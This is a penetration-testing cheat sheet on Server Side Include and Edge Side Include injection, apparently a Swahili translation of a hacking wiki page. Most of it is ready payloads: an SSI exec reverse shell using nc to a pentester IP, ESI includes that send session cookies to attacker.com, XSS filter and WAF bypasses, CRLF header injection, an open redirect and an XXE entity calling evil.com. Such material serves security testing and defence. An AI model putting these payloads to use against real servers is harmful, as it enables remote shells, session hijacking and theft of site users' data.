Server Side Inclusion/Edge Side Inclusion Injection

Server Side Inclusion Basic Information

(Utangulizi umetolewa kutoka Apache docs)

SSI (Server Side Includes) ni maagizo ambayo yanapangwa katika kurasa za HTML, na yanakaguliwa kwenye seva wakati kurasa zinatolewa. Yanakuwezesha kuongeza maudhui yanayozalishwa kwa njia ya kidijitali kwenye ukurasa wa HTML uliopo, bila ya lazima kutoa ukurasa mzima kupitia programu ya CGI, au teknolojia nyingine ya kidijitali. Kwa mfano, unaweza kuweka agizo katika ukurasa wa HTML uliopo, kama:

<!--#echo var="DATE_LOCAL" -->

Na, wakati ukurasa unapotolewa, kipande hiki kitakaguliwa na kubadilishwa na thamani yake:

Jumanne, 15-Jan-2013 19:28:54 EST

Uamuzi wa lini kutumia SSI, na lini kuwa na ukurasa wako ukizalishwa kabisa na programu fulani, mara nyingi ni suala la kiasi gani cha ukurasa ni cha kudumu, na kiasi gani kinahitaji kuhesabiwa upya kila wakati ukurasa unapotolewa. SSI ni njia nzuri ya kuongeza vipande vidogo vya taarifa, kama vile wakati wa sasa - ulioonyeshwa hapo juu. Lakini ikiwa sehemu kubwa ya ukurasa wako inazalishwa wakati inatolewa, unahitaji kutafuta suluhisho lingine.

Unaweza kudhani uwepo wa SSI ikiwa programu ya wavuti inatumia faili zenye nyongeza ** .shtml, .shtm au .stm**, lakini si hivyo tu.

Msemo wa kawaida wa SSI una muundo ufuatao:

<!--#directive param="value" -->

Angalia

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

Edge Side Inclusion

Kuna tatizo la kuhifadhi taarifa au programu za kidinamik kwani sehemu ya maudhui inaweza kuwa tofauti kwa wakati ujao maudhui yanapopatikana. Hii ndiyo sababu ESI inatumika, kuashiria kutumia lebo za ESI maudhui ya kidinamik ambayo yanahitaji kuzalishwa kabla ya kutuma toleo la cache. ikiwa mshambuliaji anaweza kuiingiza lebo ya ESI ndani ya maudhui ya cache, basi, anaweza kuwa na uwezo wa kuiingiza maudhui yasiyo na mipaka kwenye hati kabla ya kutumwa kwa watumiaji.

ESI Detection

Kichwa kifuatacho katika jibu kutoka kwa seva kinamaanisha kwamba seva inatumia ESI:

Surrogate-Control: content="ESI/1.0"

Ikiwa huwezi kupata kichwa hiki, seva inaweza kuwa inatumia ESI hata hivyo. Mbinu ya kulipua kipofu inaweza pia kutumika kwani ombi linapaswa kufika kwenye seva ya washambuliaji:

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

ESI exploitation

GoSecure created a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:

• Includes: Inasaidia <esi:includes> directive

• Vars: Inasaidia <esi:vars> directive. Inatumika kwa kupita XSS Filters

• Cookie: Vidakuzi vya hati vinapatikana kwa injini ya ESI

• Upstream Headers Required: Programu za surrogates hazitashughulikia taarifa za ESI isipokuwa programu ya juu inatoa vichwa

• Host Allowlist: Katika kesi hii, ESI inajumuisha inawezekana tu kutoka kwa wenyeji wa seva walioidhinishwa, na kufanya SSRF, kwa mfano, iwezekane tu dhidi ya wenyeji hao

XSS

The following ESI directive will load an arbitrary file inside the response of the server

<esi:include src=http://attacker.com/xss.html>

Pita ulinzi wa XSS wa mteja

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

Steal Cookie

• Kuiba cookie kwa mbali

<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />

• Pora cookie HTTP_ONLY kwa XSS kwa kuireflect katika jibu:

# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions

Faili Binafsi la Mitaa

Usichanganye hii na "Ujumuishaji wa Faili za Mitaa":

<esi:include src="secret.txt">

CRLF

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

Ifuatayo itaongeza kichwa cha Location kwenye jibu

<!--esi $add_header('Location','http://attacker.com') -->

Ongeza Kichwa

• Ongeza kichwa katika ombi lililolazimishwa

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>

• Ongeza kichwa katika jibu (ni muhimu kupita "Content-Type: text/json" katika jibu lenye XSS)

<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value

CRLF katika Ongeza kichwa (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

Akamai debug

Hii itatuma taarifa za debug zilizojumuishwa katika jibu:

<esi:debug/>

ESI + XSLT = XXE

Kwa kubainisha thamani ya xslt kwa parameter dca, inawezekana kujumuisha eXtensible Stylesheet Language Transformations (XSLT) inayotegemea ESI. Kujumuisha kunasababisha surrogati ya HTTP kupata faili za XML na XSLT, ambapo ya mwisho inachuja ya kwanza. Faili za XML kama hizo zinaweza kutumika kwa mashambulizi ya XML External Entity (XXE), ikiruhusu washambuliaji kutekeleza mashambulizi ya SSRF. Hata hivyo, matumizi ya mbinu hii yana mipaka kwani ESI tayari inajumuisha kama vector ya SSRF. Kutokana na ukosefu wa msaada katika maktaba ya Xalan, DTD za nje hazichakatwi, na kuzuia uchimbaji wa faili za ndani.

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XSLT faili:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

Check the XSLT page:

References

• https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/

• https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/

• https://academy.hackthebox.com/module/145/section/1304

• https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91

Brute-Force Detection List

Auto_Wordlists/ssi_esi.txt at main · carlospolop/Auto_WordlistsGitHub